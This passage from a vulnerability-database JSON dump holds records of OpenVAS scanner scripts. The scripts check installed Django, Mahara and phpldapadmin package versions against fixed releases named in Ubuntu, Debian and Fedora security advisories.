(CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The 
remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70550", "href": "http://plugins.openvas.org/nasl.php?oid=70550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield discovered that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\";\ntag_summary = \"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\";\n\nif(description)\n{\n script_id(70550);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070550", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": 
"# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70550\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield discovered that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your mahara packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", 
ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14986", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863642", "href": "http://plugins.openvas.org/nasl.php?oid=863642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14986\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n\n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n\n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. 
Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\");\n script_id(863642);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:59:09 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14986\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14986\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:00", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:863956", "href": "http://plugins.openvas.org/nasl.php?oid=863956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. 
Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n\n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n\n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\n\ntag_affected = \"phpldapadmin on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\");\n script_id(863956);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:15 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14924\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14924\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14986", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14986\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:59:09 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14986\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863956\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:15 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14924\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14924\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14993", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14993\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863637\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:58:32 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14993\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14993\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
